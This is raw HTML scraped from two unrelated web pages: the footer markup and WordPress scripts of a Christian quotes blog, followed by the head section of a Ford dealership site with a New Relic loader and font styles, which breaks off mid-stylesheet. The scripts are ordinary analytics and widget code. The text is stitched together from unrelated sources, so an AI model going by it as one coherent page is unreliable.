value='https://quotesthoughtsrandom.wordpress.com/2016/04/'> April 2016 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/03/'> March 2016 &nbsp;(35)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/02/'> February 2016 &nbsp;(31)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2016/01/'> January 2016 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/12/'> December 2015 &nbsp;(58)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/11/'> November 2015 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/10/'> October 2015 &nbsp;(50)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/09/'> September 2015 &nbsp;(54)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/08/'> August 2015 &nbsp;(49)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/07/'> July 2015 &nbsp;(43)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/06/'> June 2015 &nbsp;(54)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/05/'> May 2015 &nbsp;(57)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/04/'> April 2015 &nbsp;(55)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/03/'> March 2015 &nbsp;(55)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/02/'> February 2015 &nbsp;(53)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2015/01/'> January 2015 &nbsp;(81)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/12/'> December 2014 &nbsp;(77)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/11/'> November 2014 &nbsp;(60)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/10/'> October 2014 &nbsp;(41)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/09/'> September 2014 &nbsp;(46)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/08/'> August 2014 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/07/'> July 2014 &nbsp;(47)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/06/'> June 2014 &nbsp;(34)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/05/'> May 2014 &nbsp;(53)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/04/'> April 2014 &nbsp;(70)</option> <option value='https://quotesthoughtsrandom.wordpress.com/2014/03/'> March 2014 &nbsp;(16)</option> </select> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "archives-dropdown-2" ); function onSelectChange() { if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) { document.location.href = this.options[ this.selectedIndex ].value; } } dropdown.onchange = onSelectChange; })(); /* ]]> */ </script> </aside><aside id="authors-3" class="footer-widget widget_authors clear-fix"><h1></h1><ul><li><a href="https://quotesthoughtsrandom.wordpress.com/author/michaelwilson75078/"> <img alt='' src='https://1.gravatar.com/avatar/ad26741f093b411a450f087ea362e235?s=48&#038;d=identicon&#038;r=G' class='avatar avatar-48' height='48' width='48' /> <strong>Μιχαήλ (Michael) Wilson</strong></a><ul><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/16/good-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol/">&#8220;Good friend, don’t forget all I’ve taught you; take to heart my commands. They’ll help you live a long, long time, a long life lived full and well.&#8221; ~King&nbsp;Solomon</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/god-is-good-and-in-a-good-mood-lauras-story-proves-it/">God is good and in a good mood. Laura&#8217;s story proves&nbsp;it!</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/15/he-who-believes-in-the-son-has-eternal-life-but-he-who-does-not-obey-the-son-will-not-see-life-but-the-wrath-of-god-abides-on-him-jesus/">“He who believes in the Son has eternal life; but he who does not obey the Son will not see life, but the wrath of God abides on him.”&nbsp;~Jesus</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/how-do-we-show-respect-for-gods-name/">How do we show respect for God’s&nbsp;name?</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/14/those-who-put-their-trust-in-the-master-were-added-right-and-left-men-and-women-both-luke/">&#8220;Those who put their trust in the Master were added right and left, men and women both.&#8221;&nbsp;~Luke</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/13/is-heaven-the-place-of-ultimate-healing/">Is Heaven the place of ultimate&nbsp;healing?</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/13/youre-holding-on-to-me-for-dear-life-dont-be-frightened-like-that-jesus/">&#8220;You’re holding on to me for dear life! Don’t be frightened like that.&#8221;&nbsp;~Jesus</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/12/why-did-those-who-were-healed-by-jesus-follow-him/">Why did those who were healed by Jesus follow&nbsp;Him?</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/12/do-not-be-surprised-brethren-if-the-world-hates-you-apostle-john/">&#8220;Do not be surprised, brethren, if the world hates you.&#8221; ~Apostle&nbsp;John</a></li><li><a href="https://quotesthoughtsrandom.wordpress.com/2019/05/11/how-do-we-show-thankfulness-for-jesus-the-messiah/">How do we show thankfulness for Jesus the&nbsp;Messiah?</a></li></ul></li></ul></aside> </div><!-- end #about-info --> <div id="footer-widgets-holder"> <div id="footer-widgets" class="clear-fix"> <div class="footer-widget-item"> <aside id="meta-2" class="footer-widget widget_meta"><h1>Meta</h1> <ul> <li><a href="https://wordpress.com/start?ref=wplogin">Register</a></li> <li><a href="https://quotesthoughtsrandom.wordpress.com/wp-login.php">Log in</a></li> <li><a href="https://quotesthoughtsrandom.wordpress.com/feed/">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://quotesthoughtsrandom.wordpress.com/comments/feed/">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://wordpress.com/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.com</a></li> </ul> </aside> </div> <div class="footer-widget-item"> </div> <div class="footer-widget-item"> </div> <div class="footer-widget-item"> </div> </div><!-- end #footer-widgets --> </div><!-- end #footer-widgets-holder --> </div><!-- end #footer-inner-inner --> </div><!-- end #footer-inner --> </div> <div id="copyright"> <div id="copyright-inner"> <div id="copyright-inner-inner"> <p> <a href="https://wordpress.com/?ref=footer_blog">Blog at WordPress.com.</a> </p> </div><!-- end #copyright-inner-inner --> </div><!-- end #copyright-inner --> </div><!-- end #copyright --> </footer><!-- end #footer --> <!-- --> <script type='text/javascript' src='//0.gravatar.com/js/gprofiles.js?ver=201920y'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1380573781h'></script> <script> //initialize and attach hovercards to all gravatars jQuery( document ).ready( function( $ ) { if (typeof Gravatar === "undefined"){ return; } if ( typeof Gravatar.init !== "function" ) { return; } Gravatar.profile_cb = function( hash, id ) { WPGroHo.syncProfileData( hash, id ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wp-admin-bar-my-account' ); }); </script> <div style="display:none"> </div> <script type='text/javascript'> /* <![CDATA[ */ var HighlanderComments = {"loggingInText":"Logging In\u2026","submittingText":"Posting Comment\u2026","postCommentText":"Post Comment","connectingToText":"Connecting to %s","commentingAsText":"%1$s: You are commenting using your %2$s account.","logoutText":"Log Out","loginText":"Log In","connectURL":"https:\/\/quotesthoughtsrandom.wordpress.com\/public.api\/connect\/?action=request","logoutURL":"https:\/\/quotesthoughtsrandom.wordpress.com\/wp-login.php?action=logout&_wpnonce=b319ed9855","homeURL":"https:\/\/quotesthoughtsrandom.wordpress.com\/","postID":"13098","gravDefault":"identicon","enterACommentError":"Please enter a comment","enterEmailError":"Please enter your email address here","invalidEmailError":"Invalid email address","enterAuthorError":"Please enter your name here","gravatarFromEmail":"This picture will show whenever you leave a comment. Click to customize it.","logInToExternalAccount":"Log in to use details from one of these accounts.","change":"Change","changeAccount":"Change Account","comment_registration":"","userIsLoggedIn":"","isJetpack":"","text_direction":"ltr"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??/wp-content/js/jquery/jquery.autoresize.js,/wp-content/mu-plugins/highlander-comments/script.js?m=1551752381j'></script> <div id="carousel-reblog-box"> <form action="#" name="carousel-reblog"> <textarea id="carousel-reblog-content" name="carousel-reblog-content" placeholder="Add your thoughts here... (optional)"></textarea> <label for="carousel-reblog-to-blog-id" id="carousel-reblog-lblogid">Post to</label> <select name="carousel-reblog-to-blog-id" id="carousel-reblog-to-blog-id"> </select> <div class="submit"> <span class="canceltext"><a href="#" class="cancel">Cancel</a></span> <input type="submit" name="carousel-reblog-submit" class="button" id="carousel-reblog-submit" value="Reblog Post" /> <input type="hidden" id="carousel-reblog-blog-id" value="64716440" /> <input type="hidden" id="carousel-reblog-blog-url" value="https://quotesthoughtsrandom.wordpress.com" /> <input type="hidden" id="carousel-reblog-blog-title" value="Jesus Quotes and God Thoughts" /> <input type="hidden" id="carousel-reblog-post-url" value="" /> <input type="hidden" id="carousel-reblog-post-title" value="" /> </div> <input type="hidden" id="_wpnonce" name="_wpnonce" value="b8217d2509" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> <div class="arrow"></div> </div> <div class="widget widget_eu_cookie_law_widget"><div class="hide-on-button ads-active" data-hide-timeout="30" data-consent-expiration="180" id="eu-cookie-law" > <form method="post"> <input type="submit" value="Close and accept" class="accept" /> Privacy &amp; Cookies: This site uses cookies. By continuing to use this website, you agree to their use. <br /> To find out more, including how to control cookies, see here: <a href="https://automattic.com/cookies" > Cookie Policy </a> </form> </div> </div><link rel='stylesheet' id='all-css-0-3' href='https://s0.wp.com/wp-content/mu-plugins/carousel/jetpack-carousel.css?m=1524699534h&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var actionbardata = {"siteID":"64716440","siteName":"Jesus Quotes and God Thoughts","siteURL":"http:\/\/quotesthoughtsrandom.wordpress.com","icon":"<img alt='' src='https:\/\/secure.gravatar.com\/blavatar\/82948be88b6d3526d64d5a35cd6e39ad?s=50&d=https%3A%2F%2Fs2.wp.com%2Fi%2Flogo%2Fwpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' \/>","canManageOptions":"","canCustomizeSite":"","isFollowing":"","themeSlug":"pub\/chateau","signupURL":"https:\/\/wordpress.com\/start\/","loginURL":"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fquotesthoughtsrandom.wordpress.com%2F2018%2F01%2F01%2Fwelcome%2F&signup_flow=account","themeURL":"","xhrURL":"https:\/\/quotesthoughtsrandom.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"1c05bece34","isSingular":"","isFolded":"","isLoggedIn":"","isMobile":"","subscribeNonce":"<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"63c975b799\" \/>","referer":"https:\/\/quotesthoughtsrandom.wordpress.com\/","canFollow":"1","feedID":"18423589","statusMessage":"","customizeLink":"https:\/\/quotesthoughtsrandom.wordpress.com\/wp-admin\/customize.php?url=https%3A%2F%2Fquotesthoughtsrandom.wordpress.com%2F","i18n":{"view":"View site","follow":"Follow","following":"Following","edit":"Edit","login":"Log in","signup":"Sign up","customize":"Customize","report":"Report this content","themeInfo":"Get theme: Chateau","shortlink":"Copy shortlink","copied":"Copied","followedText":"New posts from this site will now appear in your <a href=\"https:\/\/wordpress.com\/\">Reader<\/a>","foldBar":"Collapse this bar","unfoldBar":"Expand this bar","editSubs":"Manage subscriptions","viewReader":"View site in Reader","viewReadPost":"View post in Reader","subscribe":"Sign me up","enterEmail":"Enter your email address","followers":"Join 9,107 other followers","alreadyUser":"Already have a WordPress.com account? <a href=\"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fquotesthoughtsrandom.wordpress.com%2F2018%2F01%2F01%2Fwelcome%2F&signup_flow=account\">Log in now.<\/a>","stats":"Stats"}}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/quotesthoughtsrandom.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"20067da137","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/quotesthoughtsrandom.wordpress.com\/wp-login.php?redirect_to=https%3A%2F%2Fquotesthoughtsrandom.wordpress.com%2F2019%2F05%2F16%2Fgood-friend-dont-forget-all-ive-taught-you-take-to-heart-my-commands-theyll-help-you-live-a-long-long-time-a-long-life-lived-full-and-well-king-sol%2F","blog_id":"64716440","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>","reblog":"Reblog","reblogged":"Reblogged","reblog_add_thoughts":"Add your thoughts here... (optional)","reblogging":"Reblogging...","post_reblog":"Post Reblog","stats_query_args":"blog=64716440&v=wpcom&tz=-5&user_id=0&subd=quotesthoughtsrandom","is_public":"1","reblog_enabled":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s0.wp.com/_static/??-eJyVUEFOAzEM/BCpKaKiF8RTUJpYxdnECbHTpb+vK7FVhaqVONkaz3jsgbm5UFmRFZJAxBMFbD+bJE9wNyrDtTyOxAKZJhT4Hjjwy3PM2FfIM8UjqgAOm9aJ0GU/g2Jp2Sv+wVf2JNTmwwSfxAF0JlXsTqlgJsYVnY+F2B18h+LFNNa5esLeKZr7DfvnBu12i6yJglLlq+jWLWx7II+ruaUtjfgRnizdfv4tm3vWA6/gex2CecnILYBpPsr7drd7e93u988v6QJABLh5'></script> <script type="text/javascript"> // <![CDATA[ (function() { try{ if ( window.external &&'msIsSiteMode' in window.external) { if (window.external.msIsSiteMode()) { var jl = document.createElement('script'); jl.type='text/javascript'; jl.async=true; jl.src='/wp-content/plugins/ie-sitemode/custom-jumplist.php'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(jl, s); } } }catch(e){} })(); // ]]> </script><script src="//stats.wp.com/w.js?60" type="text/javascript" async defer></script> <script type="text/javascript"> _tkq = window._tkq || []; _stq = window._stq || []; _tkq.push(['storeContext', {'blog_id':'64716440','blog_tz':'-5','user_lang':'en','blog_lang':'en','user_id':'0'}]); _stq.push(['view', {'blog':'64716440','v':'wpcom','tz':'-5','user_id':'0','subd':'quotesthoughtsrandom'}]); _stq.push(['extra', {'crypt':'UE5XaGUuOTlwaD85flAmcm1mcmZsaDhkV11YdTdvUG14Q2VDQTR4LlUsLi82dU1mai9BMkM9QjRQOXBLb118NFtVMDhPLzktejRycEt3ZTh3WF0seGRORmU0NS8xQ3FsPWkuUm44TUwya1ZRSHw0UnBhbEhHNW9NLllReFtOLWY9XXNmSHp8Vzh8ZVtRM2pOVDdILC9senxNWHBndVhUOGRJSFE9K3BOQWIvUFRmQzdBX3RTSFJfbWVmYm9ERUYlX2pFY1M2bGZGaVI0ciZILm4wfC0zX0FBVSVrW04/ZkVVS0tFNkdKXW9fekNwQkIza00zVEZJSz0lQmsmWWUzVVpGdi5hM0p2NkZFZWtJeHU4ZldyQUNOeHFJfFhEYnRnQ0N6LGo5eQ=='}]); _stq.push([ 'clickTrackerInit', '64716440', '0' ]); </script> <noscript><img src="https://pixel.wp.com/b.gif?v=noscript" style="height:0px;width:0px;overflow:hidden" alt="" /></noscript> <script> if ( 'object' === typeof wpcom_mobile_user_agent_info ) { wpcom_mobile_user_agent_info.init(); var mobileStatsQueryString = ""; if( false !== wpcom_mobile_user_agent_info.matchedPlatformName ) mobileStatsQueryString += "&x_" + 'mobile_platforms' + '=' + wpcom_mobile_user_agent_info.matchedPlatformName; if( false !== wpcom_mobile_user_agent_info.matchedUserAgentName ) mobileStatsQueryString += "&x_" + 'mobile_devices' + '=' + wpcom_mobile_user_agent_info.matchedUserAgentName; if( wpcom_mobile_user_agent_info.isIPad() ) mobileStatsQueryString += "&x_" + 'ipad_views' + '=' + 'views'; if( "" != mobileStatsQueryString ) { new Image().src = document.location.protocol + '//pixel.wp.com/g.gif?v=wpcom-no-pv' + mobileStatsQueryString + '&baba=' + Math.random(); } } </script></div><!-- end #page --> </body> </html>
0
<!doctype html><html lang="en-US" prefix="og: http://ogp.me/ns#"><head><meta charset="UTF-8"><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <link rel="profile" href="https://gmpg.org/xfn/11"> <script> var _jazelReadyScripts = []; function jazelReady(fn) { if (_jazelReadyScripts == null) { fn(); } else { _jazelReadyScripts.push(fn); } } function jzlDoJazelReady() { var scripts = _jazelReadyScripts.slice(); _jazelReadyScripts = null; for (var i = 0; i < scripts.length; i++) { scripts[i](); } }</script> <link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaRegular.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBlack.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBlackItalic.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBold.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaExtraLight.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaExtraLightItalic.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaItalic.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaLight.woff' as='font' type='font/woff' crossorigin /><link rel='preload' href='/content/themes/jazelbase/fonts/material-icons/MaterialIcons-Regular.woff2' as='font' type='font/woff2' crossorigin /><link rel='preload' href='//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick.min.css?ver=1.9.0' as='style' /><link rel='preload' href='//cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.9.0/slick-theme.min.css?ver=1.9.0' as='style' /><link rel='preload' href='/content/themes/jazelbase/style.min.css?ver=20190328-2300' as='style' /><link rel='preload' href='/content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.2.1' as='style' /><link rel='preload' href='/content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=5.2.1' as='style' /><link rel='prefetch' href='https://www.5starford.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4' as='script' /><link rel='prefetch' href='https://www.5starford.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1' as='script' /><link rel='prefetch' href='/content/plugins/jzl-util/analytics/js/jzaq.min.js?ver=20190206-1800' as='script' /><link rel='prefetch' href='/content/plugins/jzl-util/body-scroll-lock/js/bodyScrollLock.min.js?ver=2.6.1' as='script' /><link rel='prefetch' href='https://cdnjs.cloudflare.com/ajax/libs/mustache.js/3.0.1/mustache.min.js?ver=3.0.1' as='script' /><link rel='prefetch' href='/content/plugins/jzl-util/jzl-bind/js/jzl-bind.min.js?ver=20190507-0300' as='script' /><link rel='prefetch' href='/content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.2.1' as='script' /><style data-jro-atf-css> @font-face{font-family:'Ford Antenna';font-weight:normal;font-style:normal;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaRegular.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaRegular.ttf') format('truetype')}@font-face{font-family:'Ford Antenna';font-weight:900;font-style:normal;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBlack.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBlack.ttf') format('truetype')}@font-face{font-family:'Ford Antenna';font-weight:900;font-style:italic;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBlackItalic.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBlackItalic.ttf') format('truetype')}@font-face{font-family:'Ford Antenna';font-weight:bold;font-style:normal;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBold.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaBold.ttf') format('truetype')}@font-face{font-family:'Ford Antenna';font-weight:100;font-style:normal;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaExtraLight.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaExtraLight.ttf') format('truetype')}@font-face{font-family:'Ford Antenna';font-weight:100;font-style:italic;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaExtraLightItalic.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaExtraLightItalic.ttf') format('truetype')}@font-face{font-family:'Ford Antenna';font-weight:normal;font-style:italic;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaItalic.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaItalic.ttf') format('truetype')}@font-face{font-family:'Ford Antenna';font-weight:300;font-style:normal;font-display:swap;src:url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaLight.woff') format('woff'), url('https://s3-us-west-2.amazonaws.com/jazel-fonts/FordAntenna/FordAntennaLight.ttf') format('truetype')}html body, html button, html input, html select, html optgroup, html textarea{font-family:"Ford Antenna", Arial, Tahoma, sans-serif}</style><style data-jro-atf-css> @font-face{font-family:'Material Icons';font-style:normal;font-weight:400;font-display:swap;src:url('/content/themes/jazelbase/fonts/material-icons/MaterialIcons-Regular.eot'); src:local('Material Icons'), local('MaterialIcons-Regular'), url('/content/themes/jazelbase/fonts/material-icons/MaterialIcons-Regular.woff2') format('woff2'), url('/content/themes/jazelbase/fonts/material-icons/MaterialIcons-Regular.woff') format('woff'), url('/content/themes/jazelbase/fonts/material-icons/MaterialIcons-Regular.ttf') format('truetype')}.material-icons{font-family:'Material Icons';font-weight:normal;font-style:normal;font-size:24px; 